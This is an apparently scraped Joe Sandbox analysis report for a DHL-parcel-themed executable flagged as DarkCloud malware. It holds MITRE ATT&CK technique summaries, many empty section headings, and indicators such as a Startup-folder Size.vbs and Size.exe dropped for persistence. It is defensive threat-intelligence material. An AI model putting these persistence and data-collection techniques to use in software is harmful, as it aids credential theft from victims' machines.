Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DarkCloud

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Size.vbs

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\LogfirebasesMsNDblsEQMYcNOfhQJuUZQabadia

C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\user-PC-user\WebData

C:\Users\user\AppData\Roaming\Size.exe

C:\Users\user\AppData\Roaming\Size.exe:Zone.Identifier

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Windows Analysis Report
DHL Parcel-CBM is 3.1- Total weight is 435kgs.==WOE1910053_____________________________.exe

Function 027BB338 Relevance: 6.0, Strings: 4, Instructions: 956
COMMON

Function 027B4160 Relevance: 5.2, Strings: 4, Instructions: 207
COMMON

Function 065E0040 Relevance: 3.8, Strings: 2, Instructions: 1335
COMMON

Function 06774840 Relevance: 3.1, Strings: 2, Instructions: 632
COMMON

Function 027B4556 Relevance: 5.0, Strings: 4, Instructions: 7
COMMON

Function 065C0470 Relevance: 4.1, Strings: 3, Instructions: 370
COMMON

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre